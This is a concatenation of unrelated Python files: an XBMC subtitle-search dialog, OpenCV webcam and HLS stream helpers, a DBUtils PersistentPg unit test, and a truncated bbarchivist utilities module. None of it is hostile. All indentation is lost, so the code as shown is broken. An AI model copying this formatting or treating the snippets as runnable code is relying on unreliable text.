'ba' : 'Bashkir',
'be' : 'Belarusian',
'bg' : 'Bulgarian',
'bh' : 'Bihari',
'bi' : 'Bislama',
'bm' : 'Bambara',
'bn' : 'Bengali',
'bo' : 'Tibetan',
'br' : 'Breton',
'bs' : 'Bosnian',
'ca' : 'Catalan',
'ce' : 'Chechen',
'ch' : 'Chamorro',
'co' : 'Corsican',
'cr' : 'Cree',
'cs' : 'Czech',
'cu' : 'Old Church Slavonic',
'cv' : 'Chuvash',
'cy' : 'Welsh',
'da' : 'Danish',
'de' : 'German',
'dv' : 'Divehi',
'dz' : 'Dzongkha',
'ee' : 'Ewe',
'el' : 'Greek',
'en' : 'English',
'eo' : 'Esperanto',
'es' : 'Spanish',
'et' : 'Estonian',
'eu' : 'Basque',
'fa' : 'Persian',
'ff' : 'Fula',
'fi' : 'Finnish',
'fj' : 'Fijian',
'fo' : 'Faroese',
'fr' : 'French',
'fy' : 'Western Frisian',
'ga' : 'Irish',
'gd' : 'Scottish Gaelic',
'gl' : 'Galician',
'gn' : 'Guaraní',
'gu' : 'Gujarati',
'gv' : 'Manx',
'ha' : 'Hausa',
'he' : 'Hebrew',
'hi' : 'Hindi',
'ho' : 'Hiri Motu',
'hr' : 'Croatian',
'ht' : 'Haitian',
'hu' : 'Hungarian',
'hy' : 'Armenian',
'hz' : 'Herero',
'ia' : 'Interlingua',
'id' : 'Indonesian',
'ie' : 'Interlingue',
'ig' : 'Igbo',
'ii' : 'Nuosu',
'ik' : 'Inupiaq',
'io' : 'Ido',
'is' : 'Icelandic',
'it' : 'Italian',
'iu' : 'Inuktitut',
'ja' : 'Japanese (ja)',
'jv' : 'Javanese (jv)',
'ka' : 'Georgian',
'kg' : 'Kongo',
'ki' : 'Kikuyu',
'kj' : 'Kwanyama',
'kk' : 'Kazakh',
'kl' : 'Kalaallisut',
'km' : 'Khmer',
'kn' : 'Kannada',
'ko' : 'Korean',
'kr' : 'Kanuri',
'ks' : 'Kashmiri',
'ku' : 'Kurdish',
'kv' : 'Komi',
'kw' : 'Cornish',
'ky' : 'Kirghiz, Kyrgyz',
'la' : 'Latin',
'lb' : 'Luxembourgish',
'lg' : 'Luganda',
'li' : 'Limburgish',
'ln' : 'Lingala',
'lo' : 'Lao',
'lt' : 'Lithuanian',
'lu' : 'Luba-Katanga',
'lv' : 'Latvian',
'mg' : 'Malagasy',
'mh' : 'Marshallese',
'mi' : 'Maori',
'mk' : 'Macedonian',
'ml' : 'Malayalam',
'mn' : 'Mongolian',
'mr' : 'Marathi',
'ms' : 'Malay',
'mt' : 'Maltese',
'my' : 'Burmese',
'na' : 'Nauru',
'nb' : 'Norwegian',
'nd' : 'North Ndebele',
'ne' : 'Nepali',
'ng' : 'Ndonga',
'nl' : 'Dutch',
'nn' : 'Norwegian Nynorsk',
'no' : 'Norwegian',
'nr' : 'South Ndebele',
'nv' : 'Navajo, Navaho',
'ny' : 'Chichewa; Chewa; Nyanja',
'oc' : 'Occitan',
'oj' : 'Ojibwe, Ojibwa',
'om' : 'Oromo',
'or' : 'Oriya',
'os' : 'Ossetian, Ossetic',
'pa' : 'Panjabi, Punjabi',
'pi' : 'Pali',
'pl' : 'Polish',
'ps' : 'Pashto, Pushto',
'pt' : 'Portuguese',
'pb' : 'Brazilian',
'qu' : 'Quechua',
'rm' : 'Romansh',
'rn' : 'Kirundi',
'ro' : 'Romanian',
'ru' : 'Russian',
'rw' : 'Kinyarwanda',
'sa' : 'Sanskrit',
'sc' : 'Sardinian',
'sd' : 'Sindhi',
'se' : 'Northern Sami',
'sg' : 'Sango',
'si' : 'Sinhala, Sinhalese',
'sk' : 'Slovak',
'sl' : 'Slovene',
'sm' : 'Samoan',
'sn' : 'Shona',
'so' : 'Somali',
'sq' : 'Albanian',
'sr' : 'Serbian',
'ss' : 'Swati',
'st' : 'Southern Sotho',
'su' : 'Sundanese',
'sv' : 'Swedish',
'sw' : 'Swahili',
'ta' : 'Tamil',
'te' : 'Telugu',
'tg' : 'Tajik',
'th' : 'Thai',
'ti' : 'Tigrinya',
'tk' : 'Turkmen',
'tl' : 'Tagalog',
'tn' : 'Tswana',
'to' : 'Tonga',
'tr' : 'Turkish',
'ts' : 'Tsonga',
'tt' : 'Tatar',
'tw' : 'Twi',
'ty' : 'Tahitian',
'ug' : 'Uighur',
'uk' : 'Ukrainian',
'ur' : 'Urdu',
'uz' : 'Uzbek',
've' : 'Venda',
'vi' : 'Vietnamese',
'vo' : 'Volapük',
'wa' : 'Walloon',
'wo' : 'Wolof',
'xh' : 'Xhosa',
'yi' : 'Yiddish',
'yo' : 'Yoruba',
'za' : 'Zhuang, Chuang',
'zh' : 'Chinese',
'zu' : 'Zulu' }
SELECT_ITEM = ( 11, 256, 61453, )
EXIT_SCRIPT = ( 10, 247, 275, 61467, 216, 257, 61448, )
CANCEL_DIALOG = EXIT_SCRIPT + ( 216, 257, 61448, )
GET_EXCEPTION = ( 216, 260, 61448, )
SELECT_BUTTON = ( 229, 259, 261, 61453, )
MOVEMENT_UP = ( 166, 270, 61478, )
MOVEMENT_DOWN = ( 167, 271, 61480, )
DEBUG_MODE = 5
# Log status codes
LOG_INFO, LOG_ERROR, LOG_NOTICE, LOG_DEBUG = range( 1, 5 )
def LOG( status, format, *args ):
if ( DEBUG_MODE >= status ):
xbmc.output( "%s: %s\n" % ( ( "INFO", "ERROR", "NOTICE", "DEBUG", )[ status - 1 ], format % args, ) )
def sort_inner(inner):
if("hash" in inner and inner["hash"] == True):
return 100
return inner["percent"]
class GUI( xbmcgui.WindowXMLDialog ):
socket.setdefaulttimeout(10.0) #seconds
def __init__( self, *args, **kwargs ):
pass
def set_filepath( self, path ):
LOG( LOG_INFO, "set_filepath [%s]" , ( path ) )
self.file_original_path = path
self.file_path = path[path.find(os.sep):len(path)]
def set_filehash( self, hash ):
LOG( LOG_INFO, "set_filehash [%s]" , ( hash ) )
self.file_hash = hash
def set_filesize( self, size ):
LOG( LOG_INFO, "set_filesize [%s]" , ( size ) )
self.file_size = size
def set_searchstring( self, search ):
LOG( LOG_INFO, "set_searchstring [%s]" , ( search ) )
self.search_string = search
def set_type( self, type ):
self.file_type = type
def onInit( self ):
LOG( LOG_INFO, "onInit" )
self.setup_all()
if self.file_path:
self.connThread = threading.Thread( target=self.connect, args=() )
self.connThread.start()
def setup_all( self ):
self.setup_variables()
def setup_variables( self ):
self.controlId = -1
self.allow_exception = False
if xbmc.Player().isPlayingVideo():
self.set_filepath( xbmc.Player().getPlayingFile() )
def connect( self ):
self.setup_all()
logging.basicConfig()
self.getControl( LOADING_IMAGE ).setVisible( True )
self.getControl( STATUS_LABEL ).setLabel( "Searching" )
sub_filename = os.path.basename(self.file_original_path)
title = sub_filename[0:sub_filename.rfind(".")]
self.getControl( 180 ).setLabel("[B][UPPERCASE]$LOCALIZE[293]:[/B] " + title + "[/UPPERCASE]");
langs = None
subtitles = []
q = Queue()
self.config = ConfigParser.SafeConfigParser({"lang": "All", "plugins" : "BierDopje,OpenSubtitles", "tvplugins" : "BierDopje,OpenSubtitles", "movieplugins" : "OpenSubtitles" })
basepath = "/data/etc" # os.path.dirname(__file__)
self.config.read(basepath + "/.subtitles")
config_plugins = self.config.get("DEFAULT", "plugins")
if(self.file_type == "tv"):
config_plugins = self.config.get("DEFAULT", "tvplugins")
elif(self.file_type == "movie"):
config_plugins = self.config.get("DEFAULT", "movieplugins")
use_plugins = map(lambda x : x.strip(), config_plugins.split(","))
config_langs = self.config.get("DEFAULT", "lang")
if(config_langs != "All" and config_langs != ""):
use_langs = map(lambda x : x.strip(), config_langs.split(","))
else:
use_langs = None
for name in use_plugins:
filep = self.file_original_path
try :
plugin = getattr(plugins, name)(self.config, '/data/hack/cache')
LOG( LOG_INFO, "Searching on %s ", (name) )
thread = threading.Thread(target=plugin.searchInThread, args=(q, str(filep), use_langs))
thread.start()
except ImportError, (e) :
LOG( LOG_INFO, "Plugin %s is not a valid plugin name. Skipping it.", ( e) )
# Get data from the queue and wait till we have a result
count = 0
for name in use_plugins:
subs = q.get(True)
count = count + 1
self.getControl( STATUS_LABEL ).setLabel( "Searching " + str(count) + "/" + str(len(use_plugins)) )
if subs and len(subs) > 0:
if not use_langs:
subtitles += subs
else:
for sub in subs:
lang_code = sub["lang"]
if(lang_code == "pt-br"):
lang_code = "pb"
if lang_code in use_langs:
subtitles += [sub]
if(len(subtitles) > 0):
self.sublist = subtitles
for item in subtitles:
sub_filename = os.path.basename( self.file_original_path )
sub_filename = sub_filename[0:sub_filename.rfind(".")]
percent = (round(difflib.SequenceMatcher(None, sub_filename, item["release"]).ratio(), 2) * 100)
item["percent"] = percent
subtitles.sort(key=sort_inner,reverse=True)
for item in subtitles:
if(item["lang"] and item["release"]):
if(item["lang"] == "pt-br"):
item["lang"] = "pb"
if(item["lang"] in trans_lang):
language = trans_lang[item["lang"]]
else:
language = item["lang"]
listitem = xbmcgui.ListItem( label=language, label2=item["release"], iconImage="0.0", thumbnailImage="flags/" + item["lang"] + ".png" )
listitem.setProperty( "source", str(item["plugin"].__class__.__name__))
listitem.setProperty( "release", item["release"])
listitem.setProperty( "equals", str(item["percent"]) + "%")
if("hash" in item and item["hash"] == True):
listitem.setProperty( "sync", "true" )
else:
listitem.setProperty( "sync", "false" )
self.getControl( SUBTITLES_LIST ).addItem( listitem )
self.setFocus( self.getControl( SUBTITLES_LIST ) )
self.getControl( SUBTITLES_LIST ).selectItem( 0 )
self.getControl( LOADING_IMAGE ).setVisible( False )
self.getControl( STATUS_LABEL ).setVisible( False )
def download_subtitles(self, pos):
if self.sublist:
item = self.sublist[pos]
ok = xbmcgui.Dialog().yesno( "BoxeeSubs", _( 242 ), ( _( 243 ) % ( item["release"], ) ), "", _( 260 ), _( 259 ) )
if not ok:
self.getControl( STATUS_LABEL ).setLabel( _( 645 ) )
return
else:
local_path = xbmc.translatePath("special://home/subtitles")
dp = xbmcgui.DialogProgress()
dp.create( __scriptname__, _( 633 ), os.path.basename( self.file_path ) )
sub_filename = os.path.basename( self.file_path )
sub_filename = sub_filename[0:sub_filename.rfind(".")] + "." + item["lang"] + ".srt"
item["plugin"].downloadFile(item["link"], os.path.join( local_path, sub_filename ))
dp.close()
xbmc.Player().setSubtitles( os.path.join( local_path, sub_filename ) )
xbmc.showNotification( 652, '', '' )
self.getControl( STATUS_LABEL ).setLabel( _( 652 ) )
self.getControl( STATUS_LABEL ).setLabel( _( 649 ) )
self.exit_script()
def exit_script( self, restart=False ):
self.connThread.join()
self.close()
def onClick( self, controlId ):
if ( self.controlId == SUBTITLES_LIST ):
self.download_subtitles( self.getControl( SUBTITLES_LIST ).getSelectedPosition() )
def onFocus( self, controlId ):
self.controlId = controlId
def onAction( self, action ):
try:
if ( action.getButtonCode() in CANCEL_DIALOG ):
self.exit_script()
except:
self.exit_script()
|
app_utils.py
|
# import the necessary packages
import struct
import six
import collections
import cv2
import datetime
import subprocess as sp
import json
import numpy
import time
from matplotlib import colors
from threading import Thread
class FPS:
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self._numFrames = 0
def start(self):
# start the timer
self._start = datetime.datetime.now()
return self
def stop(self):
# stop the timer
self._end = datetime.datetime.now()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self._numFrames += 1
def elapsed(self):
# return the total number of seconds between the start and
# end interval
return (self._end - self._start).total_seconds()
def fps(self):
# compute the (approximate) frames per second
return self._numFrames / self.elapsed()
class WebcamVideoStream:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.grabbed, self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def getWidth(self):
# Get the width of the frames
return int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH))
def getHeight(self):
# Get the height of the frames
return int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT))
def getFPS(self):
# Get the frame rate of the frames
return int(self.stream.get(cv2.CAP_PROP_FPS))
def isOpen(self):
# Get the frame rate of the frames
return self.stream.isOpened()
def setFramePosition(self, framePos):
self.stream.set(cv2.CAP_PROP_POS_FRAMES, framePos)
def getFramePosition(self):
return int(self.stream.get(cv2.CAP_PROP_POS_FRAMES))
def getFrameCount(self):
return int(self.stream.get(cv2.CAP_PROP_FRAME_COUNT))
class HLSVideoStream:
def __init__(self, src):
# initialize the video camera stream and read the first frame
# from the stream
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
FFMPEG_BIN = "ffmpeg"
metadata = {}
while "streams" not in metadata.keys():
print('ERROR: Could not access stream. Trying again.')
info = sp.Popen(["ffprobe",
"-v", "quiet",
"-print_format", "json",
"-show_format",
"-show_streams", src],
stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.PIPE)
out, err = info.communicate(b"ffprobe -v quiet -print_format json -show_format -show_streams http://52.91.28.88:8080/hls/live.m3u8")
metadata = json.loads(out.decode('utf-8'))
time.sleep(5)
print('SUCCESS: Retrieved stream metadata.')
self.WIDTH = metadata["streams"][0]["width"]
self.HEIGHT = metadata["streams"][0]["height"]
self.pipe = sp.Popen([ FFMPEG_BIN, "-i", src,
"-loglevel", "quiet", # no text output
"-an", # disable audio
"-f", "image2pipe",
"-pix_fmt", "bgr24",
"-vcodec", "rawvideo", "-"],
stdin = sp.PIPE, stdout = sp.PIPE)
print('WIDTH: ', self.WIDTH)
raw_image = self.pipe.stdout.read(self.WIDTH*self.HEIGHT*3) # read 432*240*3 bytes (= 1 frame)
self.frame = numpy.fromstring(raw_image, dtype='uint8').reshape((self.HEIGHT,self.WIDTH,3))
self.grabbed = self.frame is not None
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
# if the thread indicator variable is set, stop the thread
while True:
if self.stopped:
return
raw_image = self.pipe.stdout.read(self.WIDTH*self.HEIGHT*3) # read 432*240*3 bytes (= 1 frame)
self.frame = numpy.fromstring(raw_image, dtype='uint8').reshape((self.HEIGHT,self.WIDTH,3))
self.grabbed = self.frame is not None
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
TestPersistentPg.py
|
"""Test the PersistentPg module.
Note:
We don't test performance here, so the test does not predicate
whether PersistentPg actually will help in improving performance or not.
We also assume that the underlying SteadyPg connections are tested.
Copyright and credit info:
* This test was contributed by Christoph Zwerschke
"""
import sys
import unittest
# The TestSteadyPg module serves as a mock object for the pg API module:
sys.path.insert(1, '../..')
from DBUtils.Tests import TestSteadyPg as pg
from DBUtils.PersistentPg import PersistentPg
__version__ = '1.2'
class TestPersistentPg(unittest.TestCase):
def test0_CheckVersion(self):
from DBUtils import __version__ as DBUtilsVersion
self.assertEqual(DBUtilsVersion, __version__)
from DBUtils.PersistentPg import __version__ as PersistentPgVersion
self.assertEqual(PersistentPgVersion, __version__)
self.assertEqual(PersistentPg.version, __version__)
def test1_Close(self):
for closeable in (False, True):
persist = PersistentPg(closeable=closeable)
db = persist.connection()
self.assertTrue(db._con.db and db._con.valid)
db.close()
self.assertTrue(closeable ^
(db._con.db is not None and db._con.valid))
db.close()
self.assertTrue(closeable ^
(db._con.db is not None and db._con.valid))
db._close()
self.assertTrue(not db._con.db or not db._con.valid)
db._close()
self.assertTrue(not db._con.db or not db._con.valid)
def test2_Threads(self):
numThreads = 3
persist = PersistentPg()
try:
from Queue import Queue, Empty
except ImportError: # Python 3
from queue import Queue, Empty
queryQueue, resultQueue = [], []
for i in range(numThreads):
queryQueue.append(Queue(1))
resultQueue.append(Queue(1))
def runQueries(i):
this_db = persist.connection().db
while 1:
try:
try:
q = queryQueue[i].get(1, 1)
except TypeError:
q = queryQueue[i].get(1)
except Empty:
q = None
if not q:
break
db = persist.connection()
if db.db != this_db:
r = 'error - not persistent'
else:
if q == 'ping':
r = 'ok - thread alive'
elif q == 'close':
db.db.close()
r = 'ok - connection closed'
else:
r = db.query(q)
r = '%d(%d): %s' % (i, db._usage, r)
try:
resultQueue[i].put(r, 1, 1)
except TypeError:
resultQueue[i].put(r, 1)
db.close()
from threading import Thread
threads = []
for i in range(numThreads):
thread = Thread(target=runQueries, args=(i,))
threads.append(thread)
thread.start()
for i in range(numThreads):
try:
queryQueue[i].put('ping', 1, 1)
except TypeError:
queryQueue[i].put('ping', 1)
for i in range(numThreads):
try:
r = resultQueue[i].get(1, 1)
except TypeError:
r = resultQueue[i].get(1)
self.assertEqual(r, '%d(0): ok - thread alive' % i)
self.assertTrue(threads[i].isAlive())
for i in range(numThreads):
for j in range(i + 1):
try:
queryQueue[i].put('select test%d' % j, 1, 1)
r = resultQueue[i].get(1, 1)
except TypeError:
queryQueue[i].put('select test%d' % j, 1)
r = resultQueue[i].get(1)
self.assertEqual(r, '%d(%d): test%d' % (i, j + 1, j))
try:
queryQueue[1].put('select test4', 1, 1)
r = resultQueue[1].get(1, 1)
except TypeError:
queryQueue[1].put('select test4', 1)
r = resultQueue[1].get(1)
self.assertEqual(r, '1(3): test4')
try:
queryQueue[1].put('close', 1, 1)
r = resultQueue[1].get(1, 1)
except TypeError:
queryQueue[1].put('close', 1)
r = resultQueue[1].get(1)
self.assertEqual(r, '1(3): ok - connection closed')
for j in range(2):
try:
queryQueue[1].put('select test%d' % j, 1, 1)
r = resultQueue[1].get(1, 1)
except TypeError:
queryQueue[1].put('select test%d' % j, 1)
r = resultQueue[1].get(1)
self.assertEqual(r, '1(%d): test%d' % (j + 1, j))
for i in range(numThreads):
self.assertTrue(threads[i].isAlive())
try:
queryQueue[i].put('ping', 1, 1)
except TypeError:
queryQueue[i].put('ping', 1)
for i in range(numThreads):
try:
r = resultQueue[i].get(1, 1)
except TypeError:
r = resultQueue[i].get(1)
self.assertEqual(r, '%d(%d): ok - thread alive' % (i, i + 1))
self.assertTrue(threads[i].isAlive())
for i in range(numThreads):
try:
queryQueue[i].put(None, 1, 1)
except TypeError:
queryQueue[i].put(None, 1)
def test3_MaxUsage(self):
persist = PersistentPg(20)
db = persist.connection()
self.assertEqual(db._maxusage, 20)
for i in range(100):
r = db.query('select test%d' % i)
self.assertEqual(r, 'test%d' % i)
self.assertTrue(db.db.status)
j = i % 20 + 1
self.assertEqual(db._usage, j)
self.assertEqual(db.num_queries, j)
def test4_SetSession(self):
persist = PersistentPg(3, ('set datestyle',))
db = persist.connection()
self.assertEqual(db._maxusage, 3)
self.assertEqual(db._setsession_sql, ('set datestyle',))
self.assertEqual(db.db.session, ['datestyle'])
db.query('set test')
for i in range(3):
self.assertEqual(db.db.session, ['datestyle', 'test'])
db.query('select test')
self.assertEqual(db.db.session, ['datestyle'])
def test5_FailedTransaction(self):
persist = PersistentPg()
db = persist.connection()
db._con.close()
self.assertEqual(db.query('select test'), 'test')
db.begin()
db._con.close()
self.assertRaises(pg.InternalError, db.query, 'select test')
self.assertEqual(db.query('select test'), 'test')
db.begin()
self.assertEqual(db.query('select test'), 'test')
db.rollback()
db._con.close()
self.assertEqual(db.query('select test'), 'test')
if __name__ == '__main__':
unittest.main()
|
utilities.py
|
#!/usr/bin/env python3
"""This module is used for miscellaneous utilities."""
import glob # cap grabbing
import hashlib # base url creation
import itertools # spinners gonna spin
import os # path work
import platform # platform info
import subprocess # loader verification
import sys # streams, version info
import threading # get thread for spinner
import time # spinner delay
from bbarchivist import bbconstants # cap location, version, filename bits
from bbarchivist import compat # backwards compat
from bbarchivist import dummy # useless stdout
from bbarchivist import exceptions # exceptions
from bbarchivist import iniconfig # config parsing
__author__ = "Thurask"
__license__ = "WTFPL v2"
__copyright__ = "2015-2019 Thurask"
def grab_datafile(datafile):
"""
Figure out where a datafile is.
:param datafile: Datafile to check.
:type datafile: bbconstants.Datafile
"""
try:
afile = glob.glob(os.path.join(os.getcwd(), datafile.filename))[0]
except IndexError:
afile = datafile.location if datafile.name == "cfp" else grab_capini(datafile)
return os.path.abspath(afile)
def grab_capini(datafile):
"""
Get cap location from .ini file, and write if it's new.
:param datafile: Datafile to check.
:type datafile: bbconstants.Datafile
"""
try:
apath = cappath_config_loader()
afile = glob.glob(apath)[0]
except IndexError:
cappath_config_writer(datafile.location)
return bbconstants.CAP.location # no ini cap
else:
cappath_config_writer(os.path.abspath(afile))
return os.path.abspath(afile) # ini cap
def grab_cap():
"""
Figure out where cap is, local, specified or system-supplied.
"""
return grab_datafile(bbconstants.CAP)
def grab_cfp():
"""
Figure out where cfp is, local or system-supplied.
"""
return grab_datafile(bbconstants.CFP)
def new_enough(majver, minver):
"""
Check if we're at or above a minimum Python version.
:param majver: Minimum major Python version (majver.minver).
:type majver: int
:param minver: Minimum minor Python version (majver.minver).
:type minver: int
"""
if majver > sys.version_info[0]:
sentinel = False
elif majver == sys.version_info[0] and minver > sys.version_info[1]:
sentinel = False
else:
sentinel = True
return sentinel
def dirhandler(directory, defaultdir):
"""
If directory is None, turn it into defaultdir.
:param directory: Target directory.
:type directory: str
:param defaultdir: Default directory.
:type defaultdir: str
"""
directory = defaultdir if directory is None else directory
return directory
def fsizer(file_size):
"""
Raw byte file size to human-readable string.
:param file_size: Number to parse.
:type file_size: float
"""
fsize = prep_filesize(file_size)
for sfix in ['B', 'kB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB']:
if fsize < 1024.0:
size = "{0:3.2f}{1}".format(fsize, sfix)
break
else:
fsize /= 1024.0
else:
size = "{0:3.2f}{1}".format(fsize, 'YB')
return size
def prep_filesize(file_size):
"""
Convert file size to float.
:param file_size: Number to parse.
:type file_size: float
"""
if file_size is None:
file_size = 0.0
fsize = float(file_size)
return fsize
def s2b(input_check):
"""
Return Boolean interpretation of string input.
:param input_check: String to check if it means True or False.
:type input_check: str
"""
return str(input_check).lower() in ("yes", "true", "t", "1", "y")
def i2b(input_check):
"""
Return Boolean interpretation of typed input.
:param input_check: Query to feed into input function.
:type input_check: str
"""
return s2b(input(input_check))
def is_amd64():
"""
Check if script is running on an AMD64 system (Python can be 32/64, this is for subprocess)
"""
return platform.machine().endswith("64")
def is_windows():
"""
Check if script is running on Windows.
"""
return platform.system() == "Windows"
def talkaprint(msg, talkative=False):
"""
Print only if asked to.
:param msg: Message to print.
:type msg: str
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
if talkative:
print(msg)
def get_seven_zip(talkative=False):
"""
Return name of 7-Zip executable.
On POSIX, it MUST be 7za.
On Windows, it can be installed or supplied with the script.
:func:`win_seven_zip` is used to determine if it's installed.
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
return win_seven_zip(talkative) if is_windows() else "7za"
def win_seven_zip(talkative=False):
"""
For Windows, check where 7-Zip is ("where", pretty much).
Consult registry first for any installed instances of 7-Zip.
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
talkaprint("CHECKING INSTALLED FILES...", talkative)
try:
path = wsz_registry()
except OSError as exc:
if talkative:
exceptions.handle_exception(exc, xit=None)
talkaprint("TRYING LOCAL FILES...", talkative)
return win_seven_zip_local(talkative)
else:
talkaprint("7ZIP USING INSTALLED FILES", talkative)
return '"{0}"'.format(os.path.join(path[0], "7z.exe"))
def wsz_registry():
"""
Check Windows registry for 7-Zip executable location.
"""
import winreg # windows registry
hk7z = winreg.OpenKey(winreg.HKEY_CURRENT_USER, "Software\\7-Zip")
path = winreg.QueryValueEx(hk7z, "Path")
return path
def win_seven_zip_local(talkative=False):
"""
If 7-Zip isn't in the registry, fall back onto supplied executables.
If *those* aren't there, return "error".
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
filecount = wsz_filecount()
if filecount == 2:
szexe = wsz_local_good(talkative)
else:
szexe = wsz_local_bad(talkative)
return szexe
def wsz_filecount():
"""
Get count of 7-Zip executables in local folder.
"""
filecount = len([x for x in os.listdir(os.getcwd()) if x in ["7za.exe", "7za64.exe"]])
return filecount
def wsz_local_good(talkative=False):
"""
Get 7-Zip exe name if everything is good.
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
talkaprint("7ZIP USING LOCAL FILES", talkative)
szexe = "7za64.exe" if is_amd64() else "7za.exe"
return szexe
def wsz_local_bad(talkative=False):
"""
Handle 7-Zip exe name in case of issues.
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
talkaprint("NO LOCAL FILES", talkative)
szexe = "error"
return szexe
def get_core_count():
"""
Find out how many CPU cores this system has.
"""
try:
cores = str(compat.enum_cpus()) # 3.4 and up
except NotImplementedError:
cores = "1" # 3.2-3.3
else:
if compat.enum_cpus() is None:
cores = "1"
return cores
def prep_seven_zip_path(path, talkative=False):
"""
Print p7zip path on POSIX, or notify if not there.
:param path: Path to use.
:type path: str
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
if path is None:
talkaprint("NO 7ZIP\nPLEASE INSTALL p7zip", talkative)
sentinel = False
else:
talkaprint("7ZIP FOUND AT {0}".format(path), talkative)
sentinel = True
return sentinel
def prep_seven_zip_posix(talkative=False):
"""
Check for p7zip on POSIX.
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
try:
path = compat.where_which("7za")
except ImportError:
talkaprint("PLEASE INSTALL SHUTILWHICH WITH PIP", talkative)
return False
else:
return prep_seven_zip_path(path, talkative)
def prep_seven_zip(talkative=False):
"""
Check for presence of 7-Zip.
On POSIX, check for p7zip.
On Windows, check for 7-Zip.
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
if is_windows():
final = get_seven_zip(talkative) != "error"
else:
final = prep_seven_zip_posix(talkative)
return final
def increment(version, inc=3):
"""
Increment version by given number. For repeated lookups.
:param version: w.x.y.ZZZZ, becomes w.x.y.(ZZZZ + increment).
:type version: str
:param inc: What to increment by. Default is 3.
:type inc: str
"""
splitos = version.split(".")
splitos[3] = int(splitos[3])
if splitos[3] > 9996: # prevent overflow
splitos[3] = 0
splitos[3] += int(inc)
splitos[3] = str(splitos[3])
return ".".join(splitos)
def stripper(name):
"""
Strip fluff from bar filename.
:param name: Bar filename, must contain '-nto+armle-v7+signed.bar'.
:type name: str
"""
return name.replace("-nto+armle-v7+signed.bar", "")
def create_base_url(softwareversion):
"""
Make the root URL for production server files.
:param softwareversion: Software version to hash.
:type softwareversion: str
"""
# Hash software version
swhash = hashlib.sha1(softwareversion.encode('utf-8'))
hashedsoftwareversion = swhash.hexdigest()
# Root of all urls
baseurl = "http://cdn.fs.sl.blackberry.com/fs/qnx/production/{0}".format(hashedsoftwareversion)
return baseurl
def format_app_name(appname):
"""
Convert long reverse DNS name to short name.
:param appname: Application name (ex. sys.pim.calendar -> "calendar")
:type appname: str
"""
final = appname.split(".")[-1]
return final
def create_bar_url(softwareversion, appname, appversion, clean=False):
"""
Make the URL for any production server file.
:param softwareversion: Software version to hash.
:type softwareversion: str
:param appname: Application name, preferably like on server.
:type appname: str
:param appversion: Application version.
:type appversion: str
:param clean: Whether or not to clean up app name. Default is False.
:type clean: bool
"""
baseurl = create_base_url(softwareversion)
if clean:
appname = format_app_name(appname)
return "{0}/{1}-{2}-nto+armle-v7+signed.bar".format(baseurl, appname, appversion)
def generate_urls(softwareversion, osversion, radioversion, core=False):
"""
Generate a list of OS URLs and a list of radio URLs based on input.
:param softwareversion: Software version to hash.
:type softwareversion: str
:param osversion: OS version.
:type osversion: str
:param radioversion: Radio version.
:type radioversion: str
:param core: Whether or not to return core URLs as well.
:type core: bool
"""
osurls = [
create_bar_url(softwareversion, "winchester.factory_sfi.desktop", osversion),
create_bar_url(softwareversion, "qc8960.factory_sfi.desktop", osversion),
create_bar_url(softwareversion, "qc8960.factory_sfi.desktop", osversion),
create_bar_url(softwareversion, "qc8974.factory_sfi.desktop", osversion)
]
radiourls = [
create_bar_url(softwareversion, "m5730", radioversion),
create_bar_url(softwareversion, "qc8960", radioversion),
create_bar_url(softwareversion, "qc8960.omadm", radioversion),
create_bar_url(softwareversion, "qc8960.wtr", radioversion),
create_bar_url(softwareversion, "qc8960.wtr5", radioversion),
create_bar_url(softwareversion, "qc8930.wtr5", radioversion),
create_bar_url(softwareversion, "qc8974.wtr2", radioversion)
]
coreurls = []
osurls, radiourls = filter_urls(osurls, radiourls, osversion)
if core:
coreurls = [x.replace(".desktop", "") for x in osurls]
return osurls, radiourls, coreurls
def newer_103(splitos, third):
"""
Return True if given split OS version is 10.3.X or newer.
:param splitos: OS version, split on the dots: [10, 3, 3, 2205]
:type: list(int)
:param third: The X in 10.3.X.
:type third: int
"""
newer = True if ((splitos[1] >= 4) or (splitos[1] == 3 and splitos[2] >= third)) else False
return newer
def filter_urls(osurls, radiourls, osversion):
"""
Filter lists of OS and radio URLs.
:param osurls: List of OS URLs.
:type osurls: list(str)
:param radiourls: List of radio URLs.
:type radiourls: list(str)
:param osversion: OS version.
:type osversion: str
"""
splitos = [int(i) for i in osversion.split(".")]
osurls[2] = filter_1031(osurls[2], splitos, 5) # Z3 10.3.1+
osurls[3] = filter_1031(osurls[3], splitos, 6) # Passport 10.3.1+
osurls, radiourls = pop_stl1(osurls, radiourls, splitos) # STL100-1 10.3.3+
return osurls, radiourls
def filter_1031(osurl, splitos, device):
"""
Modify URLs to reflect changes in 10.3.1.
:param osurl: OS URL to modify.
:type osurl: str
:param splitos: OS version, split and cast to int: [10, 3, 2, 2876]
:type splitos: list(int)
:param device: Device to use.
:type device: int
"""
if newer_103(splitos, 1):
